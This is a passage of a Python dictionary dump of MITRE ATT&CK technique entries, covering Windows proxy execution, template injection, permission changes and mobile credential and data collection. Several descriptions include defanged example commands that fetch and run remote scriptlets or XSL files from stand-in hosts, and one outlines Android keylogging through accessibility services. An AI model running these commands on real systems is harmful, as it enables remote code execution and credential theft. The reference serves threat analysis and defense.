                              'javascript:"\\..\\mshtml,RunHTMLApplication '
                              '";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code>  '
                              'This behavior has been seen used by malware such as Poweliks. (Citation: This is '
                              'Security Command Line Confusion)',
               'name': 'Rundll32',
               'platforms': ['Windows']},
 'T1218.012': {'attack_id': 'T1218.012',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe '
                              'is known as the Extension CLSID Verification Host and is responsible for verifying each '
                              'shell extension before they are used by Windows Explorer or the Windows '
                              'Shell.(Citation: WinOSBite verclsid.exe)\n'
                              '\n'
                              'Adversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved '
                              'by running <code>verclsid.exe /S /C {CLSID}</code>, where the file is referenced by a '
                              'Class ID (CLSID), a unique identification number used to identify COM objects. COM '
                              'payloads executed by verclsid.exe may be able to perform various malicious actions, '
                              'such as loading and executing COM scriptlets (SCT) from remote servers (similar to '
                              '[Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since it is signed and '
                              'native on Windows systems, proxying execution via verclsid.exe may bypass application '
                              'control solutions that do not account for its potential abuse.(Citation: LOLBAS '
                              'Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM '
                              'Registry)(Citation: Nick Tyrer GitHub) ',
               'name': 'Verclsid',
               'platforms': ['Windows']},
 'T1219': {'attack_id': 'T1219',
           'categories': ['command-and-control'],
           'description': 'An adversary may use legitimate desktop support and remote access software, such as Team '
                          'Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and '
                          'control channel to target systems within networks. These services are commonly used as '
                          'legitimate technical support software, and may be allowed by application control within a '
                          'target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently '
                          'when compared with other legitimate software commonly used by adversaries. (Citation: '
                          'Symantec Living off the Land)\n'
                          '\n'
                          'Remote access tools may be established and used post-compromise as alternate communications '
                          'channel for redundant access or as a way to establish an interactive remote desktop session '
                          'with the target system. They may also be used as a component of malware to establish a '
                          'reverse connection or back-connect to a service or adversary controlled system.\n'
                          '\n'
                          'Admin tools such as TeamViewer have been used by several groups targeting institutions in '
                          'countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike '
                          '2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)',
           'name': 'Remote Access Software',
           'platforms': ['Linux', 'Windows', 'macOS']},
 'T1220': {'attack_id': 'T1220',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may bypass application control and obscure execution of code by embedding '
                          'scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to '
                          'describe the processing and rendering of data within XML files. To support complex '
                          'operations, the XSL standard includes support for embedded scripting in various languages. '
                          '(Citation: Microsoft XSLT Script Mar 2017)\n'
                          '\n'
                          'Adversaries may abuse this functionality to execute arbitrary files while potentially '
                          'bypassing application control. Similar to [Trusted Developer Utilities Proxy '
                          'Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line '
                          'transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed '
                          'and used to execute malicious JavaScript embedded within local or remote (URL referenced) '
                          'XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not '
                          'installed by default, an adversary will likely need to package it with dropped files. '
                          '(Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML '
                          'source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call '
                          'the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files '
                          'an arbitrary file extension.(Citation: XSL Bypass Mar 2019)\n'
                          '\n'
                          'Command-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL '
                          'Bypass Mar 2019)\n'
                          '\n'
                          '* <code>msxsl.exe customers[.]xml script[.]xsl</code>\n'
                          '* <code>msxsl.exe script[.]xsl script[.]xsl</code>\n'
                          '* <code>msxsl.exe script[.]jpeg script[.]jpeg</code>\n'
                          '\n'
                          'Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows '
                          'Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or '
                          'VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute '
                          'local/remote scripts and, similar to its '
                          '[Regsvr32](https://attack.mitre.org/techniques/T1117)/ "Squiblydoo" counterpart, leverages '
                          'a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management '
                          'Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the '
                          '/FORMAT switch.(Citation: XSL Bypass Mar 2019)\n'
                          '\n'
                          'Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)\n'
                          '\n'
                          '* Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>\n'
                          '* Remote File: <code>wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</code>',
           'name': 'XSL Script Processing',
           'platforms': ['Windows']},
 'T1221': {'attack_id': 'T1221',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may create or modify references in Office document templates to conceal '
                          'malicious code or force authentication attempts. Microsoft’s Office Open XML (OOXML) '
                          'specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to '
                          'replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP '
                          'archives compromised of various XML files, referred to as parts, containing properties that '
                          'collectively define how a document is rendered. (Citation: Microsoft Open XML July 2017)\n'
                          '\n'
                          'Properties within parts may reference shared public resources accessed via online URLs. For '
                          'example, template properties reference a file, serving as a pre-formatted document '
                          'blueprint, that is fetched when the document is loaded.\n'
                          '\n'
                          'Adversaries may abuse this technology to initially conceal malicious code to be executed '
                          'via documents. Template references injected into a document may enable malicious payloads '
                          'to be fetched and executed when the document is loaded. (Citation: SANS Brian Wiltse '
                          'Template Injection) These documents can be delivered via other techniques such as '
                          '[Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared '
                          'Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since '
                          'no typical indicators (VBA macro, script, etc.) are present until after the malicious '
                          'payload is fetched. (Citation: Redxorblue Remote Template Injection) Examples have been '
                          'seen in the wild where template injection was used to load malicious code containing an '
                          'exploit. (Citation: MalwareBytes Template Injection OCT 2017)\n'
                          '\n'
                          'This technique may also enable [Forced '
                          'Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or '
                          'other credential prompting) URL and triggering an authentication attempt. (Citation: '
                          'Anomali Template Injection MAR 2018) (Citation: Talos Template Injection July 2017) '
                          '(Citation: ryhanson phishery SEPT 2016)',
           'name': 'Template Injection',
           'platforms': ['Windows']},
 'T1222': {'attack_id': 'T1222',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may modify file or directory permissions/attributes to evade access control '
                          'lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June '
                          '2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are '
                          'commonly managed by ACLs configured by the file or directory owner, or users with the '
                          'appropriate permissions. File and directory ACL implementations vary by platform, but '
                          'generally explicitly designate which users or groups can perform which actions (read, '
                          'write, execute, etc.).\n'
                          '\n'
                          'Modifications may include changing specific access rights, which may require taking '
                          'ownership of a file or directory and/or elevated permissions depending on the file or '
                          'directory’s existing permissions. This may enable malicious activity such as modifying, '
                          'replacing, or deleting specific files or directories. Specific file and directory '
                          'modifications may be a required step for many techniques, such as establishing Persistence '
                          'via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon '
                          'Initialization Scripts](https://attack.mitre.org/techniques/T1037), [.bash_profile and '
                          '.bashrc](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other '
                          'instrumental binary/configuration files via [Hijack Execution '
                          'Flow](https://attack.mitre.org/techniques/T1574).',
           'name': 'File and Directory Permissions Modification',
           'platforms': ['Linux', 'Windows', 'macOS']},
 'T1222.001': {'attack_id': 'T1222.001',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may modify file or directory permissions/attributes to evade access control '
                              'lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June '
                              '2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are '
                              'commonly managed by ACLs configured by the file or directory owner, or users with the '
                              'appropriate permissions. File and directory ACL implementations vary by platform, but '
                              'generally explicitly designate which users or groups can perform which actions (read, '
                              'write, execute, etc.).\n'
                              '\n'
                              'Windows implements file and directory ACLs as Discretionary Access Control Lists '
                              '(DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies '
                              'the accounts that are allowed or denied access to a securable object. When an attempt '
                              'is made to access a securable object, the system checks the access control entries in '
                              'the DACL in order. If a matching entry is found, access to the object is granted. '
                              'Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)\n'
                              '\n'
                              'Adversaries can interact with the DACLs using built-in Windows commands, such as '
                              '`icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher '
                              'permissions on specific files and folders. Further, '
                              '[PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can '
                              'be used to retrieve or modify file and directory DACLs. Specific file and directory '
                              'modifications may be a required step for many techniques, such as establishing '
                              'Persistence via [Accessibility '
                              'Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization '
                              'Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other '
                              'instrumental binary/configuration files via [Hijack Execution '
                              'Flow](https://attack.mitre.org/techniques/T1574).',
               'name': 'Windows File and Directory Permissions Modification',
               'platforms': ['Windows']},
 'T1222.002': {'attack_id': 'T1222.002',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may modify file or directory permissions/attributes to evade access control '
                              'lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June '
                              '2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are '
                              'commonly managed by ACLs configured by the file or directory owner, or users with the '
                              'appropriate permissions. File and directory ACL implementations vary by platform, but '
                              'generally explicitly designate which users or groups can perform which actions (read, '
                              'write, execute, etc.).\n'
                              '\n'
                              'Most Linux and Linux-based platforms provide a standard set of permission groups (user, '
                              'group, and other) and a standard set of permissions (read, write, and execute) that are '
                              'applied to each group. While nuances of each platform’s permissions implementation may '
                              'vary, most of the platforms provide two primary commands used to manipulate file and '
                              'directory ACLs: <code>chown</code> (short for change owner), and <code>chmod</code> '
                              '(short for change mode).\n'
                              '\n'
                              'Adversarial may use these commands to make themselves the owner of files and '
                              'directories or change the mode if current permissions allow it. They could subsequently '
                              'lock others out of the file. Specific file and directory modifications may be a '
                              'required step for many techniques, such as establishing Persistence via [.bash_profile '
                              'and .bashrc](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other '
                              'instrumental binary/configuration files via [Hijack Execution '
                              'Flow](https://attack.mitre.org/techniques/T1574).',
               'name': 'Linux and Mac File and Directory Permissions Modification',
               'platforms': ['macOS', 'Linux']},
 'T1398': {'attack_id': 'T1398',
           'categories': ['defense-evasion', 'persistence'],
           'description': 'If an adversary can escalate privileges, he or she may be able to use those privileges to '
                          'place malicious code in the device kernel or other boot partition components, where the '
                          'code may evade detection, may persist after device resets, and may not be removable by the '
                          'device user. In some cases (e.g., the Samsung Knox warranty bit as described under '
                          'Detection), the attack may be detected but could result in the device being placed in a '
                          'state that no longer allows certain functionality.\n'
                          '\n'
                          'Many Android devices provide the ability to unlock the bootloader for development purposes, '
                          'but doing so introduces the potential ability for others to maliciously update the kernel '
                          'or other boot partition code.\n'
                          '\n'
                          'If the bootloader is not unlocked, it may still be possible to exploit device '
                          'vulnerabilities to update the code.',
           'name': 'Modify OS Kernel or Boot Partition',
           'platforms': ['Android', 'iOS']},
 'T1399': {'attack_id': 'T1399',
           'categories': ['defense-evasion', 'persistence'],
           'description': 'If an adversary can escalate privileges, he or she may be able to use those privileges to '
                          "place malicious code in the device's Trusted Execution Environment (TEE) or other similar "
                          'isolated execution environment where the code can evade detection, may persist after device '
                          'resets, and may not be removable by the device user. Running code within the TEE may '
                          'provide an adversary with the ability to monitor or tamper with overall device '
                          'behavior.(Citation: Roth-Rootkits)',
           'name': 'Modify Trusted Execution Environment',
           'platforms': ['Android']},
 'T1400': {'attack_id': 'T1400',
           'categories': ['defense-evasion', 'persistence', 'impact'],
           'description': 'If an adversary can escalate privileges, he or she may be able to use those privileges to '
                          'place malicious code in the device system partition, where it may persist after device '
                          'resets and may not be easily removed by the device user.\n'
                          '\n'
                          'Many Android devices provide the ability to unlock the bootloader for development purposes. '
                          'An unlocked bootloader may provide the ability for an adversary to modify the system '
                          'partition. Even if the bootloader is locked, it may be possible for an adversary to '
                          'escalate privileges and then modify the system partition.',
           'name': 'Modify System Partition',
           'platforms': ['Android', 'iOS']},
 'T1401': {'attack_id': 'T1401',
           'categories': ['persistence'],
           'description': 'A malicious application can request Device Administrator privileges. If the user grants the '
                          'privileges, the application can take steps to make its removal more difficult.',
           'name': 'Abuse Device Administrator Access to Prevent Removal',
           'platforms': ['Android']},
 'T1402': {'attack_id': 'T1402',
           'categories': ['persistence', 'execution'],
           'description': 'An intent is a message passed between Android application or system components. '
                          'Applications can register to receive broadcast intents at runtime, which are system-wide '
                          'intents delivered to each app when certain events happen on the device, such as network '
                          'changes or the user unlocking the screen. Malicious applications can then trigger certain '
                          'actions within the app based on which broadcast intent was received.\n'
                          '\n'
                          'Further, malicious applications can register for intents broadcasted by other applications '
                          'in addition to the Android system itself. This allows the malware to respond based on '
                          'actions in other applications. This behavior typically indicates a more intimate knowledge, '
                          'or potentially the targeting of specific devices, users, or applications.\n'
                          '\n'
                          'In Android 8 (API level 26), broadcast intent behavior was changed, limiting the implicit '
                          'intents that applications can register for in the manifest. In most cases, applications '
                          'that register through the manifest will no longer receive the broadcasts. Now, applications '
                          'must register context-specific broadcast receivers while the user is actively using the '
                          'app.(Citation: Android Changes to System Broadcasts)',
           'name': 'Broadcast Receivers',
           'platforms': ['Android']},
 'T1403': {'attack_id': 'T1403',
           'categories': ['persistence'],
           'description': 'ART (the Android Runtime) compiles optimized code on the device itself to improve '
                          'performance. An adversary may be able to use escalated privileges to modify the cached code '
                          'in order to hide malicious behavior. Since the code is compiled on the device, it may not '
                          'receive the same level of integrity checks that are provided to code running in the system '
                          'partition.(Citation: Sabanal-ART)',
           'name': 'Modify Cached Executable Code',
           'platforms': ['Android']},
 'T1404': {'attack_id': 'T1404',
           'categories': ['privilege-escalation'],
           'description': 'A malicious app can exploit unpatched vulnerabilities in the operating system to obtain '
                          'escalated privileges.',
           'name': 'Exploit OS Vulnerability',
           'platforms': ['Android', 'iOS']},
 'T1405': {'attack_id': 'T1405',
           'categories': ['credential-access', 'privilege-escalation'],
           'description': 'A malicious app or other attack vector could be used to exploit vulnerabilities in code '
                          'running within the Trusted Execution Environment (TEE) (Citation: Thomas-TrustZone). The '
                          'adversary could then obtain privileges held by the TEE potentially including the ability to '
                          'access cryptographic keys or other sensitive data (Citation: QualcommKeyMaster). Escalated '
                          'operating system privileges may be first required in order to have the ability to attack '
                          'the TEE (Citation: EkbergTEE). If not, privileges within the TEE can potentially be used to '
                          'exploit the operating system (Citation: laginimaineb-TEE).',
           'name': 'Exploit TEE Vulnerability',
           'platforms': ['Android']},
 'T1406': {'attack_id': 'T1406',
           'categories': ['defense-evasion'],
           'description': 'An app could contain malicious code in obfuscated or encrypted form, then deobfuscate or '
                          'decrypt the code at runtime to evade many app vetting techniques.(Citation: Rastogi) '
                          '(Citation: Zhou) (Citation: TrendMicro-Obad) (Citation: Xiao-iOS)',
           'name': 'Obfuscated Files or Information',
           'platforms': ['Android', 'iOS']},
 'T1407': {'attack_id': 'T1407',
           'categories': ['defense-evasion'],
           'description': 'An app could download and execute dynamic code (not included in the original application '
                          'package) after installation to evade static analysis techniques (and potentially dynamic '
                          'analysis techniques) used for application vetting or application store review.(Citation: '
                          'Poeplau-ExecuteThis)\n'
                          '\n'
                          'On Android, dynamic code could include native code, Dalvik code, or JavaScript code that '
                          "uses the Android WebView's JavascriptInterface capability.(Citation: Bromium-AndroidRCE)\n"
                          '\n'
                          'On iOS, techniques also exist for executing dynamic code downloaded after application '
                          'installation.(Citation: FireEye-JSPatch)(Citation: Wang)',
           'name': 'Download New Code at Runtime',
           'platforms': ['Android', 'iOS']},
 'T1408': {'attack_id': 'T1408',
           'categories': ['defense-evasion'],
           'description': 'An adversary could use knowledge of the techniques used by security software to evade '
                          'detection(Citation: Brodie)(Citation: Tan). For example, some mobile security products '
                          'perform compromised device detection by searching for particular artifacts such as an '
                          'installed "su" binary, but that check could be evaded by naming the binary something else. '
                          'Similarly, polymorphic code techniques could be used to evade signature-based '
                          'detection(Citation: Rastogi).',
           'name': 'Disguise Root/Jailbreak Indicators',
           'platforms': ['Android', 'iOS']},
 'T1409': {'attack_id': 'T1409',
           'categories': ['collection', 'credential-access'],
           'description': 'Adversaries may access and collect application data resident on the device. Adversaries '
                          'often target popular applications such as Facebook, WeChat, and Gmail.(Citation: SWB Exodus '
                          'March 2019)\n'
                          '\n'
                          'This technique requires either escalated privileges or for the targeted app to have stored '
                          'the data in an insecure manner (e.g., with insecure file permissions or in an insecure '
                          'location such as an external storage directory).',
           'name': 'Access Stored Application Data',
           'platforms': ['Android', 'iOS']},
 'T1410': {'attack_id': 'T1410',
           'categories': ['collection', 'credential-access'],
           'description': 'An adversary may capture network traffic to and from the device to obtain credentials or '
                          'other sensitive data, or redirect network traffic to flow through an adversary-controlled '
                          'gateway to do the same.\n'
                          '\n'
                          'A malicious app could register itself as a VPN client on Android or iOS to gain access to '
                          'network packets. However, on both platforms, the user must grant consent to the app to act '
                          'as a VPN client, and on iOS the app requires a special entitlement that must be granted by '
                          'Apple.\n'
                          '\n'
                          'Alternatively, if a malicious app is able to escalate operating system privileges, it may '
                          'be able to use those privileges to gain access to network traffic.\n'
                          '\n'
                          'An adversary could redirect network traffic to an adversary-controlled gateway by '
                          "establishing a VPN connection or by manipulating the device's proxy settings. For example, "
                          'Skycure (Citation: Skycure-Profiles) describes the ability to redirect network traffic by '
                          'installing a malicious iOS Configuration Profile.\n'
                          '\n'
                          'If applications encrypt their network traffic, sensitive data may not be accessible to an '
                          'adversary, depending on the point of capture.',
           'name': 'Network Traffic Capture or Redirection',
           'platforms': ['Android', 'iOS']},
 'T1411': {'attack_id': 'T1411',
           'categories': ['credential-access'],
           'description': 'The operating system and installed applications often have legitimate needs to prompt the '
                          'user for sensitive information such as account credentials, bank account information, or '
                          'Personally Identifiable Information (PII). Adversaries may mimic this functionality to '
                          'prompt users for sensitive information.\n'
                          '\n'
                          'Compared to traditional PCs, the constrained display size of mobile devices may impair the '
                          'ability to provide users with contextual information, making users more susceptible to this '
                          'technique’s use.(Citation: Felt-PhishingOnMobileDevices)\n'
                          '\n'
                          'Specific approaches to this technique include:\n'
                          '\n'
                          '### Impersonate the identity of a legitimate application\n'
                          '\n'
                          'A malicious application could impersonate the identity of a legitimate application (e.g. '
                          'use the same application name and/or icon) and get installed on the device. The malicious '
                          'app could then prompt the user for sensitive information.(Citation: eset-finance)\n'
                          '\n'
                          '### Display a prompt on top of a running legitimate application\n'
                          '\n'
                          'A malicious application could display a prompt on top of a running legitimate application '
                          'to trick users into entering sensitive information into the malicious application rather '
                          'than the legitimate application. Typically, the malicious application would need to know '
                          'when the targeted application (and individual activity within the targeted application) is '
                          'running in the foreground, so that the malicious application knows when to display its '
                          'prompt. Android 5.0 and 5.1.1, respectively, increased the difficulty of determining the '
                          'current foreground application through modifications to the `ActivityManager` '
                          'API.(Citation: Android-getRunningTasks)(Citation: StackOverflow-getRunningAppProcesses). A '
                          'malicious application can still abuse Android’s accessibility features to determine which '
                          'application is currently in the foreground.(Citation: ThreatFabric Cerberus) Approaches to '
                          'display a prompt include:\n'
                          '\n'
                          '* A malicious application could start a new activity on top of a running legitimate '
                          'application.(Citation: Felt-PhishingOnMobileDevices)(Citation: Hassell-ExploitingAndroid) '
                          'Android 10 places new restrictions on the ability for an application to start a new '
                          'activity on top of another application, which may make it more difficult for adversaries to '
                          'utilize this technique.(Citation: Android Background)\n'
                          '* A malicious application could create an application overlay window on top of a running '
                          'legitimate application. Applications must hold the `SYSTEM_ALERT_WINDOW` permission to '
                          'create overlay windows. This permission is handled differently than typical Android '
                          'permissions, and at least under certain conditions is automatically granted to applications '
                          'installed from the Google Play Store.(Citation: Cloak and Dagger)(Citation: NowSecure '
                          'Android Overlay)(Citation: Skycure-Accessibility) The `SYSTEM_ALERT_WINDOW` permission and '
                          'its associated ability to create application overlay windows are expected to be deprecated '
                          'in a future release of Android in favor of a new API.(Citation: XDA Bubbles)\n'
                          '\n'
                          '### Fake device notifications\n'
                          '\n'
                          'A malicious application could send fake device notifications to the user. Clicking on the '
                          'device notification could trigger the malicious application to display an input '
                          'prompt.(Citation: Group IB Gustuff Mar 2019)',
           'name': 'Input Prompt',
           'platforms': ['Android', 'iOS']},
 'T1412': {'attack_id': 'T1412',
           'categories': ['collection', 'credential-access'],
           'description': 'A malicious application could capture sensitive data sent via SMS, including authentication '
                          'credentials. SMS is frequently used to transmit codes used for multi-factor '
                          'authentication.\n'
                          '\n'
                          'On Android, a malicious application must request and obtain permission (either at app '
                          'install time or run time) in order to receive SMS messages. Alternatively, a malicious '
                          'application could attempt to perform an operating system privilege escalation attack to '
                          'bypass the permission requirement.\n'
                          '\n'
                          'On iOS, applications cannot access SMS messages in normal operation, so an adversary would '
                          'need to attempt to perform an operating system privilege escalation attack to potentially '
                          'be able to access SMS messages.',
           'name': 'Capture SMS Messages',
           'platforms': ['Android', 'iOS']},
 'T1413': {'attack_id': 'T1413',
           'categories': ['collection', 'credential-access'],
           'description': 'On versions of Android prior to 4.1, an adversary may use a malicious application that '
                          'holds the READ_LOGS permission to obtain private keys, passwords, other credentials, or '
                          "other sensitive data stored in the device's system log. On Android 4.1 and later, an "
                          'adversary would need to attempt to perform an operating system privilege escalation attack '
                          'to be able to access the log.',
           'name': 'Access Sensitive Data in Device Logs',
           'platforms': ['Android']},
 'T1414': {'attack_id': 'T1414',
           'categories': ['collection', 'credential-access'],
           'description': 'Adversaries may abuse Clipboard Manager APIs to obtain sensitive information copied to the '
                          'global clipboard. For example, passwords being copy-and-pasted from a password manager app '
                          'could be captured by another application installed on the device.(Citation: '
                          'Fahl-Clipboard)\n'
                          '\n'
                          'On Android, <code>ClipboardManager.OnPrimaryClipChangedListener</code> can be used by '
                          'applications to register as a listener and monitor the clipboard for changes.(Citation: '
                          'Github Capture Clipboard 2019)\n'
                          '\n'
                          'Android 10 mitigates this technique by preventing applications from accessing clipboard '
                          'data unless the application is on the foreground or is set as the device’s default input '
                          'method editor (IME).(Citation: Android 10 Privacy Changes)',
           'name': 'Capture Clipboard Data',
           'platforms': ['Android', 'iOS']},
 'T1416': {'attack_id': 'T1416',
           'categories': ['credential-access'],
           'description': 'Adversaries may register Uniform Resource Identifiers (URIs) to intercept sensitive data.\n'
                          '\n'
                          'Applications regularly register URIs with the operating system to act as a response handler '
                          'for various actions, such as logging into an app using an external account via single '
                          'sign-on. This allows redirections to that specific URI to be intercepted by the '
                          'application. If a malicious application were to register for a URI that was already in use '
                          'by a genuine application, the malicious application may be able to intercept data intended '
                          'for the genuine application or perform a phishing attack against the genuine application. '
                          'Intercepted data may include OAuth authorization codes or tokens that could be used by the '
                          'malicious application to gain access to resources.(Citation: Trend Micro iOS URL '
                          'Hijacking)(Citation: IETF-PKCE)',
           'name': 'URI Hijacking',
           'platforms': ['Android', 'iOS']},
 'T1417': {'attack_id': 'T1417',
           'categories': ['collection', 'credential-access'],
           'description': 'Adversaries may capture user input to obtain credentials or other information from the user '
                          'through various methods.\n'
                          '\n'
                          'Malware may masquerade as a legitimate third-party keyboard to record user '
                          'keystrokes.(Citation: Zeltser-Keyboard) On both Android and iOS, users must explicitly '
                          'authorize the use of third-party keyboard apps. Users should be advised to use extreme '
                          'caution before granting this authorization when it is requested.\n'
                          '\n'
                          'On Android, malware may abuse accessibility features to record keystrokes by registering an '
                          '`AccessibilityService` class, overriding the `onAccessibilityEvent` method, and listening '
                          'for the `AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED` event type. The event object passed '
                          'into the function will contain the data that the user typed.\n'
                          '\n'
                          'Additional methods of keylogging may be possible if root access is available.',
           'name': 'Input Capture',
           'platforms': ['Android', 'iOS']},
 'T1418': {'attack_id': 'T1418',
           'categories': ['defense-evasion', 'discovery'],
           'description': 'Adversaries may seek to identify all applications installed on the device. One use case for '
                          'doing so is to identify the presence of endpoint security applications that may increase '
                          "the adversary's risk of detection. Another use case is to identify the presence of "
                          'applications that the adversary may wish to target.\n'
                          '\n'
                          'On Android, applications can use methods in the PackageManager class (Citation: '
                          'Android-PackageManager) to enumerate other apps installed on device, or an entity with '
                          'shell access can use the pm command line tool.\n'
                          '\n'
                          'On iOS, apps can use private API calls to obtain a list of other apps installed on the '
                          'device. (Citation: Kurtz-MaliciousiOSApps) However, use of private API calls will likely '
                          "prevent the application from being distributed through Apple's App Store.",
           'name': 'Application Discovery',
           'platforms': ['Android', 'iOS']},
 'T1420': {'attack_id': 'T1420',
           'categories': ['discovery'],
           'description': 'On Android, command line tools or the Java file APIs can be used to enumerate file system '
                          'contents. However, Linux file permissions and SELinux policies generally strongly restrict '
                          'what can be accessed by apps (without taking advantage of a privilege escalation exploit). '
                          'The contents of the external storage directory are generally visible, which could present '
                          'concern if sensitive data is inappropriately stored there.\n'
                          '\n'
                          "iOS's security architecture generally restricts the ability to perform file and directory "
                          'discovery without use of escalated privileges.',
           'name': 'File and Directory Discovery',
           'platforms': ['Android']},
 'T1421': {'attack_id': 'T1421',
           'categories': ['discovery'],
           'description': 'On Android, applications can use standard APIs to gather a list of network connections to '
                          'and from the device. For example, the Network Connections app available in the Google Play '
                          'Store (Citation: ConnMonitor) advertises this functionality.',
           'name': 'System Network Connections Discovery',
           'platforms': ['Android']},
 'T1422': {'attack_id': 'T1422',
           'categories': ['discovery'],
           'description': 'On Android, details of onboard network interfaces are accessible to apps through the '
                          '`java.net.NetworkInterface` class.(Citation: NetworkInterface) The Android '
                          '`TelephonyManager` class can be used to gather related information such as the IMSI, IMEI, '
                          'and phone number.(Citation: TelephonyManager)\n'
                          '\n'
                          'On iOS, gathering network configuration information is not possible without root access.',
           'name': 'System Network Configuration Discovery',
           'platforms': ['Android', 'iOS']},
 'T1423': {'attack_id': 'T1423',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to get a listing of services running on remote hosts, including '
                          'those that may be vulnerable to remote software exploitation. Methods to acquire this '
                          'information include port scans and vulnerability scans from the mobile device. This '
                          "technique may take advantage of the mobile device's access to an internal enterprise "
                          'network either through local connectivity or through a Virtual Private Network (VPN).',
           'name': 'Network Service Scanning',
           'platforms': ['Android', 'iOS']},
 'T1424': {'attack_id': 'T1424',
           'categories': ['discovery'],
           'description': 'On Android versions prior to 5, applications can observe information about other processes '
                          'that are running through methods in the ActivityManager class. On Android versions prior to '
                          '7, applications can obtain this information by executing the <code>ps</code> command, or by '
                          'examining the <code>/proc</code> directory. Starting in Android version 7, use of the Linux '
                          "kernel's <code>hidepid</code> feature prevents applications (without escalated privileges) "
                          'from accessing this information (Citation: Android-SELinuxChanges).',
           'name': 'Process Discovery',
           'platforms': ['Android']},
 'T1426': {'attack_id': 'T1426',
           'categories': ['discovery'],
           'description': 'An adversary may attempt to get detailed information about the operating system and '
                          'hardware, including version, patches, and architecture.\n'
                          '\n'
                          'On Android, much of this information is programmatically accessible to applications through '
                          'the android.os.Build class.(Citation: Android-Build)\n'
                          '\n'
                          'On iOS, techniques exist for applications to programmatically access this '
                          'information.(Citation: StackOverflow-iOSVersion)',
           'name': 'System Information Discovery',
           'platforms': ['Android', 'iOS']},
 'T1427': {'attack_id': 'T1427',
           'categories': ['lateral-movement'],
           'description': 'With escalated privileges, an adversary could program the mobile device to impersonate USB '
                          'devices such as input devices (keyboard and mouse), storage devices, and/or networking '
                          'devices in order to attack a physically connected PC(Citation: '
                          'Wang-ExploitingUSB)(Citation: ArsTechnica-PoisonTap) This technique has been demonstrated '
                          'on Android. We are unaware of any demonstrations on iOS.',
           'name': 'Attack PC via USB Connection',
           'platforms': ['Android']},
 'T1428': {'attack_id': 'T1428',
           'categories': ['lateral-movement'],
           'description': 'Adversaries may attempt to exploit enterprise servers, workstations, or other resources '
                          "over the network. This technique may take advantage of the mobile device's access to an "
                          'internal enterprise network either through local connectivity or through a Virtual Private '
                          'Network (VPN).',
           'name': 'Exploit Enterprise Resources',
           'platforms': ['Android', 'iOS']},
 'T1429': {'attack_id': 'T1429',
           'categories': ['collection'],
           'description': 'Adversaries may capture audio to collect information on a user of a mobile device using '
                          'standard operating system APIs. Adversaries may target audio information such as user '
                          'conversations, surroundings, phone calls, or other sensitive information.\n'
                          '\n'
                          'Android and iOS, by default, requires that an application request access to microphone '
                          'devices from the user. In Android, applications must hold the '
                          '<code>android.permission.RECORD_AUDIO</code> permission to access the microphone and the '
                          '<code>android.permission.CAPTURE_AUDIO_OUTPUT</code> permission to access audio output such '
                          'as speakers. Android does not allow third-party applications to hold '
                          '<code>android.permission.CAPTURE_AUDIO_OUTPUT</code>, so audio output can only be obtained '
                          'by privileged applications (distributed by Google or the device vendor) or after a '
                          'successful privilege escalation attack. In iOS, applications must include the '
                          '`NSMicrophoneUsageDescription` key in their `Info.plist` file.',
           'name': 'Capture Audio',
           'platforms': ['Android', 'iOS']},
 'T1430': {'attack_id': 'T1430',
           'categories': ['collection', 'discovery'],
           'description': 'An adversary could use a malicious or exploited application to surreptitiously track the '
                          "device's physical location through use of standard operating system APIs.",
           'name': 'Location Tracking',
           'platforms': ['Android', 'iOS']},
 'T1432': {'attack_id': 'T1432',
           'categories': ['collection'],
